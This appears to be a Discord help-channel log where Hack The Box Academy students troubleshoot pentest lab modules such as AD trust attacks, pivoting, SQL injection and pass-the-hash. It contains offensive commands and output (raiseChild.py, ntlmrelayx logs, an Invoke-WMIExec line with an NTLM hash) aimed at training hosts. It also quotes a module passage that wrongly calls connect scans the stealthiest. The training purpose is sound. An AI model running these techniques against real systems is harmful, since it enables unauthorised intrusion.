Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Module: AD Enumeration & Attacks
Section: Attacking Domain Trusts - Child -> Parent Trusts - from Linux
https://academy.hackthebox.com/module/143/section/1508
I need a nudge on the end of section question. I've logged onto the attack host, ACADEMY-EA-ATTACK01. I can see there's another machine ACADEMY-EA-DC02, which seems to be a DC. It seems to be the parent DC? (I'm unsure)
INFORMATION GATHERING - WEB EDITION
Skills Assessment
What is the API key in the hidden admin directory that you have discovered on the target system?
i tried to bruteforce with ffuf, dns enum and gobuster - but i haven't found a hidden directory. any hint?
check the domain name and it should be pretty obvious
The domain name? I tried performing an Nmap scan of ACADEMY-EA-DC02 and it returned the domain ||INLANEFREIGHT.LOCAL|| as part of the report. But that seems to be the parent DC. I was assuming that with this question, we'd be starting off having compromised the child domain?
did you spawn the target for that section
Yes, it's spawned two machines, the ones I listed in my initial question.
right then you should find the child domain to begin the attack
DM!
just checked, DC02 is the child domain DC, you might want to check the output again
You're right. I just did a script scan and it showed the FQDN.
So I need to compromise the child domain first before I can perform the ExtraSids attack?
netexec will output the domain name rightaway btw
you already have the DA creds, it's the same as the previous section
Has that tool been covered in the module? I don't think so, right?
Oh okay, great, thanks.
pretty sure I've mentioned it a few times before, it's just cme but updated
Should I just replace cme with netexec then?
I ran this command which gave me a shell:
||```powershell
raiseChild.py -target-exec 10.129.73.221 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm
```||
However, the shell seems to be for the DC02? Not the parent's DC? I thought this command was supposed to autopwn and provide shell access to the parent DC?
your target needs to be the parent dc
I'd suggest to check the section again on both the manual and automated methods to understand what they're doing
yes
Alrighty
hey, I'm new to htb academy. if i hover over this highlighted text will it show some info about it in a small box kind of? it's mentioned that it will show some info in this section but if i hover over the highlighted text in yellow nothing is showing up. I mean, am i missing something or is it just highlighted text?
Hi, is it possible to see, on a website which uses an AI tool in the background, the prompt and so on?
Hi,
Module: Information Gathering - Web Edition
Section: Skill Assessment
Question: "After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb."
I'm using ffuf and zaproxy and I was fuzzing http://inlanefreight.htb:port/FUZZ url with these seclist wordlist: common.txt, big.txt, directory-list-2.3-medium.txt but with no luck. I did the same for subdomain and hidden admin directory.
What am I missing? 😄 Can someone share a hint?
you can see it in the "Which" paragraph if you scroll up a bit
yeah, now i have some idea of how it works. Thank you.
DM!
<@&861185840277487616> at this point I swear they're a bot
Thanks, I'll keep an eye on that
They do the same in the parrot discord but haven't said anything
Thanks for help 🙂
hey, having issues submitting commands on mysql. screenshot attached, looks correct from my previous notes. any ideas?
like it's not coming back as an error, just to a new line. I remember mysql being awkward
lol never mind. exited mysql and logged back in and it's working fine now
SQL INJECTION FUNDAMENTALS
Intro to MySQL
Why cant i connect to the sql server??
mysql -u root -h Target_ip -P Target_port -p
bash: mysql: command not found
@gusty patio Install mysql
even on the machine?
@gusty patio On you attacking machine
shouldnt the pwnbox have it pre installed? I can see a file named mysql_config but thats about all
did the update break it 
i can connect thanks for the help
Hi, do I need to perform OSINT: Corporate Recon in order to take the Penetration Testing Certification exam?
Is it part of the penetration path?
Have you finished the skill assessment?
On the exam page, OSINT isn't mentioned, but it does appear under the job role of a Penetration Tester.
Is it part of the job role path to complete as a requirement of the exam?
On the exam page, the module isn't mentioned, but it states that I need to follow the Penetration Tester path, and on the Penetration Tester page, OSINT is listed.
you don't need to finish the OSINT module, a little bit of osint is mentioned here and there throughout the course(like in the information gathering module)
https://academy.hackthebox.com/paths/jobrole
where do you see the osint module listed under the Penetration Tester path?
Hi guys
I am writing for XSS phishing on HTB
My payload is this but when I want to send it via send.php, it says "issue with the URL"
What can I do now?
Note: I remove server and client IPs
did they say you need those modules for cpts?
No, my bad, thx for the help.
you'll just need to complete the Penetration Tester job-role path
Wrap your code in triple backticks,
```
<Code goes here />
```
<Code goes here />
It's easier to read and prevents formatting clobber.
https://academy.hackthebox.com/module/84/section/1747
Using CrackMapExec - Skill Assessment
I have used ||drop-sc|| and have ||ntlmrelay|| on but it does not output any hashes
[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.129.204.182, attacking target smb://172.16.15.15
[*] Authenticating against smb://172.16.15.15 as INLANEFREIGHT/JAMES SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Received connection from 10.129.204.182, attacking target smb://172.16.15.20
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Authenticating against smb://172.16.15.20 as INLANEFREIGHT/JAMES SUCCEED
ntlmrelayx does relaying as the name suggests, there's another tool that can capture the hash instead
Thanks, I will use that. Got confused by the module instructions
As for others who check later:
Yes it worked and no need for proxychains
its not the network connection...
hi, anybody completed the HTTP Misconfiguration Skill Assessment - Hard? can i get a nudge?
hello how do i get permission to talk in general channel and pwnbox?
Read and follow #welcome
Connect Scan
The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends an SYN packet to the target port and waits for a response. It is considered open if the target port responds with an SYN-ACK packet and closed if it responds with an RST packet.
The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS). It is useful when we want to map the network and don't want to disturb the services running behind it, thus causing a minimal impact and sometimes considered a more polite scan method.
it says TCP scan is more stealthy compared to SYN scan. Isn't this wrong? I thought TCP scan is more likely to get detected since it completes the three-way handshake. I googled online and most ppl say the same as me. am I misunderstanding something here?
amazing module. shout out to 21y4d for the awesome content
so burpsuite is just not reaching the box on the Exam now for me, I have pinged it nmapped it, gone to it on my own browser. Any ideas?
i had issues reaching some targets using the US vpn pack recently. not sure if it's possible on the exam, but if you can it might worth regenerating your ovpn file in the eu region instead
Appreciate it, downloaded a new vpn file but didn't think about that
Yeah still not working lol
new to cyber security
feeling lost... don't know where to start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
restart your box and if it still fails reach out to support
games would be ctfs. platform hackthebox. hope this helped
I doubt it's a problem with the exam env, if they can reach the web server then the env is good
probably something with burp
Hi there, is anyone having issues with the PASSWORD ATTACKS windows machines? it keeps in Target(s) are spawning forever 😦
xsltproc, rename the target using mv target target.xml then run the command and drag the xml into firefox. just putting this here
Hey guys, I'm having a little bit of a hard time understanding what chisel and proxychains are used for. It's in the Pass the Ticket Linux section of the PASSWORD ATTACKS module (Using Linux Attack Tools with Kerberos). Thanks in advance for any help
Hello people, I need help with hacking an Instagram account which is trying to impersonate my friend. Need to hack his ID and delete my photos
no
you can use them to access hosts that are in another network that you have no access to
also no
hey guys, I'm trying to perform an Nmap scan on a target IP, but I'm encountering issues. When I run sudo nmap -sV IP, it shows the host is down. Using -Pn shows the host is up, but all ports are filtered. Scanning port 80 with sudo nmap -sV -Pn -p 80 IP shows it as filtered without displaying the service version. My local firewall (ufw) is inactive, how can i solve this?
why do i always see someone in here with google or instagram hacking stuff. i don't know jack bout that
Because people just look up "hacking" in server discovery
is this in the nmap section? i am on service enumeration right now
Yes, although in the module, they use proxychains AND chisel, but never showed why we used proxychains...
makes sense
proxychains is used to tunnel traffic through chisel
So, from my attacking machine: I configured proxychains as socks5 localhost and port 1080. Then set up a chisel reverse server and connect back from the jump host. So now, should I be able to access the linux machine? (which is part of the network of MS01/jumphost). And also, from which part / how does chisel use proxychains in that scenario?
im not impressive enough to do instagram hacking stuff, i just look at splunk and mft and $j
yes it's in the nmap section, i had some issues dealing with this. i already uses the htb vpn but the result still filtered and the scan time took so long
which sub module
Here is how I see it, but I don't understand how proxychains is used by chisel
Pentesting Basics : Service Scanning
chisel creates the socks tunnel, proxychains gets whatever program that you're running to use that tunnel
they will explain more in the Pivoting, Tunneling, and Port Forwarding module
can you link that, i can't find it
Okay thanks... cus in this module I'm kinda confused, they just put you on the spot
Ohhh I see now! So basically proxychains uses the chisel tunnel, so it can access hosts in another network ex:
Well don't worry about hacking ig accounts because it's illegal lol
ah ok, i skipped that to get to Nmap (next module), i need to go back, i thought it was going to be pretty short
Pentesting basics isn't a module btw
You generally shouldn't skip modules in the path
I hack into your mother's room
That's unfortunate
ohh sorry, i didn't know it wasn't a module
It's called getting started
Marcielee the type of person to simswap her exes
huh?
huh?
btw do you guys know how to solve the issues?
The module name is "Getting Started" btw
yeah there's a nice blog at : http://127.0.0.1/
Make sure you only have 1 vpn running, don't use pwnbox and vpn at the same time
Please don't troll people that legitimately need help with learning
Its just a small tiny joke :/
Ok ill stop cus i need help too
Still not funny
^
oh yeah that's right
yeah i only use the openvpn one and it still not working. should i use the parrot from the htb instead of kali?
Kali should work
Try: resetting the target, changing VPN regions
Optional: pray to a higher power, pray to a lower power
do ps aux | grep openvpn in terminal
check if you have only one connection or multiple
and you should also try running the openvpn file as sudo : sudo openvpn <name>.ovpn
He would get a "no route to host" error if he couldn't at least connect to it
I suggest also sudo killall openvpn then rerunning the connection
it finally works, thanks guys
This has nothing to do with htb
I suggest deleting these images as they're completely irrelevant
These are fake support messages
So just ignore
Only what you enter
They could steal cookie/token data maybe
You can view a list of devices that have recently logged into your Instagram account in Settings.
Best practice: don't click suspicious links or emails
Just ignore and move on
Yes that's how discord works
yep 🙂
Hello I have a question, why would someone want to convert a wordlist such as rockyou.txt in kali to utf-8? What are the advantages of doing this?
Don't know if this is the right server to ask?
Is it okay if I Dm? I'm stuck on the rce after trying both methods
sure
I think that depends on what you're using the wordlist for
A lab I set up from vulnhub
Yeah, I'm struggling to understand when and why to convert to UTF-8, I'm still beginner/intermediate
I'm honestly not sure why kali wouldn't be able to parse and make use of both wordlists.
like when you're making a download cradle on kali to run on windows, you have to encode it in UTF 16 I think
I could be wrong with the UTF value choosing
honestly im not the best person to ask so I'll be quiet lol
Thanks for helping though appreciate it
Hello, can someone help me with ligolo? I would like to do a double pivot but unfortunately I can't make it work with only ligolo, do you use another solution? It is for the module Attacking Enterprise Networks
Ligolo works fine for me in double pivots. I practiced it on the double pivot section in the pivoting module first
You need to have a listener on the first host you have ligolo running on point back to you, then on the second host you need to have it connect to the first host:port you are forwarding
With newer versions you need to set up multiple tunnels if you want multiple concurrent sessions
#Module: Introduction to C#
#Section: Arrays
End of section question. Obviously getting the answer wrong. Seems simple. No clue what I'm missing here. Using semicolon. Tried several variations. Any help here would be greatly appreciated.
nvm got it
how to save output of cmd into a text file. findstr /spin "password" . . I am not able to copy, any suggestions to filter result
it's kinda dumb but there should be no spaces in the answer
```
─[zuuuttt@parrot]─[~/htb_cpts/modules/password_attacks]
└──╼ $proxychains evil-winrm -i dc01.inlanefreight.htb -r inlanefreight.htb
ProxyChains-3.1 (http://proxychains.sf.net)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
|DNS-request| DC01.inlanefreight.htb
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|S-chain|-<>-127.0.0.1:1080-<><>-4.2.2.2:53-<--timeout
|DNS-response|: DC01.inlanefreight.htb does not exist
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Invalid argument
Error: Exiting with code 1
```
you need to add DC01 to your /etc/hosts
it also looks like your proxychains is proxying through a public IP
been added. don't understand why it is dns'ing for the address
wait I've seen this one before
is it in your hosts list as DC01.inlanefreight.htb?
oh?
same problem here
172.16.1.10 inlanefreight.htb inlanefreight dc01 dc01.inlanefreight.htb 172.16.1.5 ms01.inlanefreight.htb ms01
but idk how they solved it
pspsps @fringe urchin
they seem to be having the same issue you did
My way of solving it: use ligolo 
ligolo-ng is a pivoting tool that's (imo) better than chisel/dynamic forwarding that requires proxychains
Lol
Yea seems like same issue as i had... i shut down my pc and came back next day and it worked
Just pain
But yea just learn ligolo, way less pain in later modules as well from what i heard

Solution: just turn it off and on again 🗿
ligolo-ng >>> create a tunnel with plastic cups and a string > other tools
write that down, write that down
Does anyone know what USDT/ERC-20 Flashing is? I know it works, although 90% is someone trying to get you to install a keylogger. I thought in the area of maybe flash loans in combination with RBF; could anyone explain how it works?
Google that shit as keyloggers aren't covered in htb academy
read correctly, I'm not trying to make a keylogger
this isn't the place to be asking about that stuff
My point is, keyloggers aren't covered by academy
where could i ask?
looked all around the internet but no one could help me
yea im sorry on it
Sounds like an issue with your question then
?
I wrote one for my bachelor
If you can't find your answer by googling, then the issue is you're asking the wrong question
i know it works cause i tried it

it has something to do with an exodus bug and RBF
Hey all. Currently working on Premature Session Population in the "Abusing HTTP Misconfigurations" module. I followed every steps shown exactly in the section but still can't bypass auth. Any nudges would be appreciated. thanks.
yo @fathom pendant I got a question 😅
im trying to brute force vhosts on the information gathering module, however its not working 😅
error msg? and the command you ran
i've only ever used gobuster vhost with the domain passed to -u, i don't know if that matters tho
try running with --verbose
https://github.com/OJ/gobuster?tab=readme-ov-file#vhost-mode
--domain string the domain to append when using an IP address as URL. If left empty and you specify a domain based URL the hostname from the URL is extracted
Not sure how I go about fixing this issue, but sqlmap doesn't work properly on my kali vm but on pwnbox it works fine, always get connection timed out on the url. Both using the same command, any thoughts if its my hyper-v or something blocking my vm?
Can you give more info, like, if you can access the same url from a web browser on your VM?
yup can access both on the vm and the pwnbox
vm sqlmap version is 1.8.6.3#dev where as pwn is 1.8.3#stable, maybe issue is in this?
Then a screenshot of the sqlmap command with the result? Did you try to run sqlmap with -v 6?
Oh you're running a dev version? Why?
probably not the issue, the only real difference is the latency between your box and the target is higher than from the pwnbox
try increase the timeout?
yup ran with -v 6, and gonna try increasing timeout
yea I got it
still [Critical] connection timed out with a --timeout=240 lol
could u show the entire command output, and the cmd u ran
run a curl in the same screenshot just incase
In metasploit path, meterpreter module while trying to spin up msf I’m getting an error while checking “db_status”
Error: postgresql selected, no connection
I have tried solutions from the other forums and what not but this doesn’t seem to get connected to the database
Tried deleting msfdb and changing port on database.yml file but to no avail. Also, the service is up and running for postgresql.
If anybody has encountered this same problem how did you go about fixing it?
no idea 😆
my kali works with the same sqlmap version
you can run it through a proxy or wireshark if you want to know why
1.8.6.3#dev or pwnbox stable version?
also some AV might be blocking the requests
dev
Hi people, in the SQL Injection module in HTB Academy, I have to use mysql to connect to a remote server, but in the pwn box machine there is only mysql_config package. I tried to install mysql, but failed. Can someone help me?
hmm maybe adding an windows defender exclusion to my VM might help?
defender shouldn't block it
default-mysql-client
solved it, needed to add a --random-agent to my kali VM where the pwnbox somehow resolves it someway
thanks for the helps all
anyone can help me with LPE - log rotate? my payload wont work been stuck on this for 3 days
Can anyone help me with this question, it's to pass david's hash and read file on the share, i did the same for user julio and got the reverse shell, but for david it's not working 😦
||PS C:\tools> Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username david -Hash c39f2beb3d2ec06a62cb887fb391dee0 -Command "powershell -e <base64-encoded command>" [-] inlanefreight.htb\david WMI access denied on DC01||
Ah yes, the famous question with david's hash from that one module... which one was it already?
Invoke-WMIExec needs admin rights, the error is telling you the user doesn't have sufficient rights. you'll need to use another way to get the flag
Solved, idk why i always spend days on a question, and solve it after 2 minutes of asking discord (discord's magic)
Got it, thanks mate.
To append a domain, you need a domain for it to attach
Don't use the pwnbox and vpn at the same time
It's likely some setting tweak then
oh you mean check if there's a different sqlmap.conf file on the pwnbox?
It was probably blocked because sqlmap literally has "sqlmap" in its user agent by default, like some nmap modules do too
Likely
The main point of the section is to try all the methods mentioned in it
And if you visit the page in a browser it gives you a hint to what to use
ya that does make sense, just threw me off because nothing was making sqlmap work including the show solution walkthrough but worked on the pwnbox :/
¯_(ツ)_/¯
just didn't know if it was my hyper-v , AV , or something blocking it
You have to bear in mind all the modules are confirmed doable on pwnbox
It would be nothing on your end
nah the config files are the same
even if it's blocking the agent or something, it wouldn't be timing out
so it's the server's WAF denying me but letting pwnboxes through?
did you get any of these warnings on your own vm with sqlmap?
[WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests?
[CRITICAL] connection timed out
Not sure I think I just used the flags
I swear someone had this exact message months ago
I had only posted... since I didn't get any response... I have reposted it as a reminder
If any cyber security professional is there in this channel... please help me out by participating in this online survey
You need to send requests for postings like that to moderation staff for approval prior. And you generally have more success with some prior engagement. 🙂
Most people are hesitant to trust a random Google form
There's also more channels you can unlock via following #welcome
I had got the permission for the first time... Do I have to get the permission... for putting a reminder message again?
Sorry for the inconvenience... I'm new to Discord...